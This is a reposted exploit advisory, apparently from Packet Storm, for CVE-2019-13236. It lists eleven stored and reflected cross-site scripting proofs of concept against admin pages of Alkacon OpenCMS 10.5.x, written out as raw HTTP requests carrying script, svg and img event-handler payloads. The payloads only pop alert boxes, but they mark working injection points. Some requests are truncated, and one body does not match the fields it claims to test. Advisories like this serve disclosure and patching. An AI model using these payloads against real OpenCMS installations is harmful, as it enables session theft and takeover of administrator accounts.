Alkacon OpenCMS 10.5.x Cross Site Scripting

#231
Topic created · 1 Posts · 0 Views
  • Alkacon OpenCMS version 10.5.x suffers from a cross site scripting vulnerability in its site management functionality.
    MD5 | 675ae0b7a5129ab86f65c89e2dd22a5a
    Download

    # Exploit Title: Alkacon OpenCMS 10.5.x - Multiple XSS in Alkacon OpenCms Site Management  
    # Google Dork: N/A  
    # Date: 18/07/2019  
    # Exploit Author: Aetsu  
    # Vendor Homepage: http://www.opencms.org  
    # Software Link: https://github.com/alkacon/opencms-core  
    # Version: 10.5.x  
    # Tested on: 10.5.5 / 10.5.4  
    # CVE : CVE-2019-13236  
    1. In Site Management > New site (Stored XSS):  
    - Affected resource title.0:  
    POC:  
    

    POST /system/workplace/admin/sites/new.jsp HTTP/1.1
    Host: example.com
    title.0=%3Csvg+onload%3Dalert%28%27Title%27%29%3E&sitename.0=%3Csvg+onload%3Dalert%28%27Folder+name%27%29%3E&se

    2. In Treeview (Reflected XSS):  
    - Affected resource type:  
    POC:  
    

    http://example.com/opencms/system/workplace/views/explorer/tree_fs.jsp?type=
    </script><script>confirm(1)</script>&includefiles=true&showsiteselector=true&projectaware=false&treesite=

    3. In Workspace tools > Login message (Stored XSS):  
    - Affected resource message.0:  
    POC:  
    

    POST /system/workplace/admin/workplace/loginmessage.jsp HTTP/1.1
    Host: example.com
    enabled.0=true&enabled.0.value=true&message.0=<svg
    onload=alert(1)>&loginForbidden.0.value=false&ok=Ok&elementname=undefined&path=%252Fworkplace%252Floginmessage&elementindex=0&action=save&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Fworkplace&style=new&page=page1&framename=

    4. In Index sources > View index sources > New index source (Stored XSS):  
    - Affected resource name.0:  
    POC:  
    

    POST /system/workplace/admin/searchindex/indexsource-new.jsp HTTP/1.1
    Host: example.com
    name.0=%3Csvg+onload%3Dalert%28%27Name%27%29%3E&indexerClassName.0=org.opencms.search.CmsVfsIndexer&ok=Ok&elementname=undefined&path=%252Fsearchindex%252Findexsources%252Findexsource-new&elementindex=0&action=save&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Fsearchindex%252Findexsources%2526action%253Dinitial&style=new&page=page1&framename=

    5. In Index sources > View field configuration > New field configuration  
    (Stored XSS):  
    - Affected resource name.0:  
    POC:  
    

    POST /system/workplace/admin/searchindex/fieldconfiguration-new.jsp HTTP/1.1
    Host: example.com
    name.0=%3Csvg+onload%3Dalert%28%27Name%27%29%3E&ok=Ok&elementname=undefined&path=%252Fsearchindex%252Ffieldconfigurations%252Ffieldconfiguration-new&elementindex=0&action=save&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Fsearchindex%252Ffieldconfigurations%2526action%253Dinitial&style=new&page=page1&framename=

    6. In Account Management > Impor/Export user data (Reflected XSS):  
    - Affected resource oufqn:  
    POC:  
    

    POST /system/workplace/admin/accounts/imexport_user_data/export_csv.jsp
    HTTP/1.1
    Host: example.com
    groups.0=Users&ok=Ok&oufqn=</script><script>confirm(1)</script>&elementname=undefined&path=%252Faccounts%252Forgunit%252Fimexport%252Fexportcsv&elementindex=0&action=save&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Faccounts%252Forgunit%252Fimexport%2526action%253Dinitial&style=new&page=page1&framename=

    7. In Account Management > Group Management > New Group (Stored XSS):  
    - Affected resources name.0 and description.0:  
    POC:```  
    POST /system/workplace/admin/accounts/group_new.jsp HTTP/1.1  
    Host: example.com  
    name.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Name%27%29%3E&description.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Description%27  
    
    1. In Account Management > Organizational Unit > Organizational Unit
      Management > New sub organizational unit (Stored XSS):
    • Affected resources parentOuDesc.0 and resources.0:
      POC:```
      POST /system/workplace/admin/accounts/unit_new.jsp HTTP/1.1
      Host: example.com
      name.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Name%27%29%3E&description.0=%3Cimg+src%3D.+onerror%3Dalert%28%27D
    9. In Link Validator > External Link Validator > Validate External Links  
    (Reflected XSS):  
    - Affected resources reporttype, reportcontinuekey and title:  
    POC:```  
    POST  
    /system/workplace/views/admin/admin-main.jsp?path=%2Flinkvalidation%2Fexternal%2Fvalidateexternallinks  
    HTTP/1.1  
    Host: example.com  
    dialogtype=imp&reporttype=extended66955%22%3balert(1)%2f%2f297&reportcontinuekey=&title=External%2BLink%2BValidation&path=%252Flinkvalidation%252Fexternal%252Fvalidateexternallinks&threadhasnext=&action=confirmed&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Flinkvalidation%252Fexternal&style=new&framename=&ok=OK  
    
    1. In Administrator view > Database management > Extended html import >
      Default html values (Reflected XSS):
    • Affected resources destinationDir.0, imageGallery.0, linkGallery.0,
      downloadGallery.0:
      POC:```
      POST /system/workplace/admin/database/htmlimport/htmldefault.jsp HTTP/1.1
      Host: example.com
      ------WebKitFormBoundaryLyJOmAtrd8ArxNqf
      Content-Disposition: form-data; name="inputDir.0"
      .
      ------WebKitFormBoundaryLyJOmAtrd8ArxNqf
      Content-Disposition: form-data; name="destinationDir.0"
      /whbo0"><script>alert(1)</script>nrbhd
      ------WebKitFormBoundaryLyJOmAtrd8ArxNqf
      Content-Disposition: form-data; name="imageGallery.0"
      ------WebKitFormBoundaryLyJOmAtrd8ArxNqf
      Content-Disposition: form-data; name="downloadGallery.0"
      ------WebKitFormBoundaryLyJOmAtrd8ArxNqf
      Content-Disposition: form-data; name="linkGallery.0"
      [...]
    11. In Administrator view > Database management > Extended html import >  
    Default html values (Reflected XSS):  
    - Affected resources destinationDir.0, imageGallery.0, linkGallery.0 and  
    downloadGallery.0:  
    POC:  
    

    POST /system/workplace/admin/database/htmlimport/htmlimport.jsp HTTP/1.1
    Host: example.com
    ------WebKitFormBoundary6fy3ENawtXT0qmgB
    Content-Disposition: form-data; name="inputDir.0"
    gato
    ------WebKitFormBoundary6fy3ENawtXT0qmgB
    Content-Disposition: form-data; name="destinationDir.0"
    testszfgw"><script>alert(1)</script>vqln7
    ------WebKitFormBoundary6fy3ENawtXT0qmgB
    Content-Disposition: form-data; name="imageGallery.0"
    test
    ------WebKitFormBoundary6fy3ENawtXT0qmgB
    Content-Disposition: form-data; name="downloadGallery.0"
    test
    ------WebKitFormBoundary6fy3ENawtXT0qmgB
    Content-Disposition: form-data; name="linkGallery.0"
    test
    [...]

    Extended POCs: https://aetsu.github.io/OpenCms  
    

    Source: packetstormsecurity.com

Log in to reply